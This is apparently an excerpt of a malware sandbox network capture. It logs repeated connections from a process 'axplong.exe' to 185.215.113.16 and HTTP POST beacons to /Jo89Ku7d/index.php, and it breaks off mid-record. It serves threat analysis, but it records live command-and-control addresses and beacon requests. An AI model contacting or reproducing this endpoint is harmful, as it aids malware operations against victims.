                              Jul 26, 2024 21:00:27.329821110 CEST5115980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:27.335273981 CEST5115980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:27.335562944 CEST5116080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:27.354754925 CEST8051160185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:27.354835033 CEST5116080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:27.355459929 CEST5116080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:27.355645895 CEST8051159185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:27.355751991 CEST5115980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:27.361856937 CEST8051160185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:28.143049002 CEST8051160185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:28.143223047 CEST5116080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:28.254604101 CEST5116080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:28.254993916 CEST5116180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:28.285171032 CEST8051161185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:28.287914991 CEST5116180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:28.288142920 CEST5116180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:28.304181099 CEST8051161185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:28.334913015 CEST8051160185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:28.334975004 CEST5116080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:29.105829954 CEST8051161185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:29.105911970 CEST5116180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:29.109411955 CEST5116180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:29.109874010 CEST5116280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:29.131165028 CEST8051162185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:29.131297112 CEST5116280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:29.131510973 CEST5116280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:29.145080090 CEST8051162185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:29.151060104 CEST8051161185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:29.151119947 CEST5116180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:29.951849937 CEST8051162185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:29.951926947 CEST5116280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.069116116 CEST5116280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.069987059 CEST5116380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.075170040 CEST8051163185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.075392962 CEST5116380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.075882912 CEST8051162185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.076282978 CEST5116280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.076989889 CEST5116380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.081765890 CEST8051163185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.850505114 CEST8051163185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.850569963 CEST5116380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.854501009 CEST5116380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.854840994 CEST5116480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.860213041 CEST8051164185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.860285997 CEST5116480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.862812996 CEST5116480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.873970985 CEST8051164185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.873985052 CEST8051163185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.874063015 CEST5116380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.888293028 CEST8051164185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.888382912 CEST5116480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.974548101 CEST5116580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.980456114 CEST8051165185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:30.980541945 CEST5116580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.980807066 CEST5116580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:30.985687017 CEST8051165185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:31.837157965 CEST8051165185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:31.837224960 CEST5116580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:31.840317965 CEST5116580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:31.840692043 CEST5116680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:31.855447054 CEST8051166185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:31.855716944 CEST5116680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:31.856188059 CEST5116680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:31.856355906 CEST8051165185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:31.856441975 CEST5116580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:31.861654043 CEST8051166185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:32.659017086 CEST8051166185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:32.659097910 CEST5116680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:32.769140005 CEST5116680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:32.770646095 CEST5116780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:32.796535015 CEST8051167185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:32.796678066 CEST5116780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:32.796981096 CEST5116780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:32.802427053 CEST8051167185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:32.809386969 CEST8051166185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:32.809464931 CEST5116680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:33.558598995 CEST8051167185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:33.558664083 CEST5116780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:33.562213898 CEST5116780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:33.562550068 CEST5116880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:33.567739964 CEST8051168185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:33.569446087 CEST8051167185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:33.569694042 CEST5116780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:33.569694996 CEST5116880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:33.569848061 CEST5116880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:33.574678898 CEST8051168185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:34.375782013 CEST8051168185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:34.377043009 CEST5116880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:34.487688065 CEST5116880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:34.488049984 CEST5116980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:34.493096113 CEST8051168185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:34.493324041 CEST8051169185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:34.493402004 CEST5116880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:34.493444920 CEST5116980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:34.493619919 CEST5116980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:34.498948097 CEST8051169185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:35.282812119 CEST8051169185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:35.282872915 CEST5116980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:35.287786007 CEST5116980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:35.288198948 CEST5117080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:35.293344975 CEST8051169185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:35.293400049 CEST5116980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:35.293415070 CEST8051170185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:35.293484926 CEST5117080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:35.293651104 CEST5117080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:35.298574924 CEST8051170185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:36.257325888 CEST8051170185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:36.257529020 CEST5117080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:36.363009930 CEST5117080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:36.363379955 CEST5117180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:36.368959904 CEST8051171185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:36.369071007 CEST5117180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:36.369342089 CEST5117180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:36.372956991 CEST8051170185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:36.373020887 CEST5117080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:36.374551058 CEST8051171185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:37.266617060 CEST8051171185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:37.266732931 CEST5117180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:37.269844055 CEST5117180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:37.270179033 CEST5117280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:37.275755882 CEST8051171185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:37.275830030 CEST5117180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:37.276339054 CEST8051172185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:37.276407003 CEST5117280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:37.276602030 CEST5117280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:37.282046080 CEST8051172185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:38.076704979 CEST8051172185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:38.076889992 CEST5117280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.191314936 CEST5117280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.191611052 CEST5117380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.204896927 CEST8051173185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:38.204960108 CEST5117380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.205142021 CEST5117380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.210014105 CEST8051173185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:38.210161924 CEST8051172185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:38.210391045 CEST5117280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.960272074 CEST8051173185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:38.960345984 CEST5117380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.963639021 CEST5117380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.964006901 CEST5117480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.970379114 CEST8051174185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:38.970459938 CEST5117480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.970710039 CEST5117480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.971120119 CEST8051173185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:38.971174002 CEST5117380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:38.976737022 CEST8051174185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:40.467555046 CEST8051174185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:40.467657089 CEST5117480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:40.467659950 CEST8051174185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:40.467705011 CEST5117480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:40.468456030 CEST8051174185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:40.468518019 CEST5117480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:40.581624985 CEST5117480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:40.581935883 CEST5117580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:40.587074995 CEST8051174185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:40.587285042 CEST5117480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:40.587642908 CEST8051175185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:40.587768078 CEST5117580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:40.588011980 CEST5117580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:40.593107939 CEST8051175185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:41.662581921 CEST8051175185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:41.662662029 CEST5117580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:41.665632963 CEST5117580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:41.665987968 CEST5117680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:41.672389030 CEST8051176185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:41.672461033 CEST5117680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:41.672707081 CEST5117680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:41.679280996 CEST8051176185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:41.688652039 CEST8051175185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:41.688714027 CEST5117580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:42.550302982 CEST8051176185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:42.550362110 CEST5117680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:42.659648895 CEST5117680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:42.659956932 CEST5117780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:42.667593956 CEST8051177185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:42.667669058 CEST5117780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:42.667838097 CEST8051176185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:42.667886972 CEST5117680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:42.668124914 CEST5117780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:42.674540043 CEST8051177185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:43.425728083 CEST8051177185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:43.425968885 CEST5117780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:43.429066896 CEST5117780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:43.429450989 CEST5117880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:43.434597015 CEST8051178185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:43.434664011 CEST5117880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:43.434977055 CEST8051177185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:43.434999943 CEST5117880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:43.435024977 CEST5117780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:43.440624952 CEST8051178185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:44.157211065 CEST5117880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:44.269251108 CEST5117980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:44.278964043 CEST8051179185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:44.279057026 CEST5117980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:44.279313087 CEST5117980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:44.285607100 CEST8051179185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:45.053205013 CEST8051179185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:45.053293943 CEST5117980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.055876970 CEST5117980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.056191921 CEST5118080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.061654091 CEST8051180185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:45.061728954 CEST5118080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.061975002 CEST5118080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.067771912 CEST8051180185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:45.069607973 CEST8051179185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:45.069669962 CEST5117980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.833709955 CEST8051180185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:45.833813906 CEST5118080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.940715075 CEST5118080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.941056013 CEST5118180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.946086884 CEST8051181185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:45.946510077 CEST8051180185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:45.946604013 CEST5118080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.946856022 CEST5118180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.946856022 CEST5118180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:45.951672077 CEST8051181185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:47.451484919 CEST8051181185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:47.451540947 CEST5118180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:47.452342033 CEST8051181185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:47.452388048 CEST5118180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:47.452452898 CEST8051181185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:47.452691078 CEST5118180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:47.455339909 CEST5118180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:47.455655098 CEST5118280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:47.460566998 CEST8051182185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:47.460819006 CEST5118280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:47.460967064 CEST5118280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:47.467402935 CEST8051182185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:47.486129045 CEST8051181185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:47.486193895 CEST5118180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:48.437192917 CEST8051182185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:48.441050053 CEST5118280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:48.550517082 CEST5118280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:48.550812006 CEST5118380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:48.556060076 CEST8051183185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:48.556133986 CEST5118380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:48.556248903 CEST5118380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:48.557600021 CEST8051182185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:48.557661057 CEST5118280192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:48.561105013 CEST8051183185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:49.359194040 CEST8051183185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:49.359405041 CEST5118380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:49.363106966 CEST5118380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:49.363403082 CEST5118480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:49.371335983 CEST8051184185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:49.371409893 CEST5118480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:49.371634960 CEST8051183185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:49.371691942 CEST5118480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:49.371694088 CEST5118380192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:49.377959013 CEST8051184185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:50.211755037 CEST8051184185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:50.211915970 CEST5118480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:50.316180944 CEST5118480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:50.316533089 CEST5118580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:50.327394962 CEST8051184185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:50.327471972 CEST8051185185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:50.327527046 CEST5118480192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:50.327697039 CEST5118580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:50.327857018 CEST5118580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:50.337904930 CEST8051185185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:51.134630919 CEST8051185185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:51.134701014 CEST5118580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:51.138722897 CEST5118580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:51.139280081 CEST5118680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:51.144646883 CEST8051186185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:51.144731045 CEST5118680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:51.145494938 CEST5118680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:51.145767927 CEST8051185185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:51.145833969 CEST5118580192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:51.152453899 CEST8051186185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:51.908798933 CEST8051186185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:51.909209013 CEST5118680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.018722057 CEST5118680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.019069910 CEST5118780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.024681091 CEST8051187185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:52.024749041 CEST5118780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.024971008 CEST5118780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.025135994 CEST8051186185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:52.025197983 CEST5118680192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.031212091 CEST8051187185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:52.828098059 CEST8051187185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:52.828161001 CEST5118780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.831480026 CEST5118780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.831986904 CEST5118880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.838188887 CEST8051188185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:52.838371038 CEST5118880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.838639975 CEST5118880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.838865042 CEST8051187185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:52.838927031 CEST5118780192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:52.844733000 CEST8051188185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:53.604022980 CEST8051188185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:53.604096889 CEST5118880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:53.722642899 CEST5118880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:53.723258972 CEST5118980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:53.728301048 CEST8051189185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:53.728378057 CEST5118980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:53.728637934 CEST5118980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:53.729374886 CEST8051188185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:53.729598999 CEST5118880192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:53.733495951 CEST8051189185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:54.485096931 CEST8051189185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:54.489048004 CEST5118980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:54.491864920 CEST5118980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:54.492131948 CEST5119080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:54.497384071 CEST8051190185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:54.497942924 CEST8051189185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:54.498049021 CEST5118980192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:54.498294115 CEST5119080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:54.498294115 CEST5119080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:54.503278017 CEST8051190185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:55.251640081 CEST8051190185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:55.251728058 CEST5119080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:55.363351107 CEST5119080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:55.363729000 CEST5119180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:55.368730068 CEST8051191185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:55.369230986 CEST8051190185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:55.369322062 CEST5119080192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:55.369493008 CEST5119180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:55.369916916 CEST5119180192.168.2.6185.215.113.16
                              Jul 26, 2024 21:00:55.375216007 CEST8051191185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:56.157407045 CEST8051191185.215.113.16192.168.2.6
                              Jul 26, 2024 21:00:56.157574892 CEST5119180192.168.2.6185.215.113.16
                              TimestampSource PortDest PortSource IPDest IP
                              Jul 26, 2024 20:59:26.978061914 CEST5350869162.159.36.2192.168.2.6
                              Jul 26, 2024 20:59:27.471333981 CEST6505353192.168.2.61.1.1.1
                              Jul 26, 2024 20:59:27.491683960 CEST53650531.1.1.1192.168.2.6
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jul 26, 2024 20:59:27.471333981 CEST192.168.2.61.1.1.10x296Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jul 26, 2024 20:59:27.491683960 CEST1.1.1.1192.168.2.60x296Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                              • 185.215.113.16
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649699185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:03.951773882 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:05.168243885 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:05.168586969 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:05.170865059 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
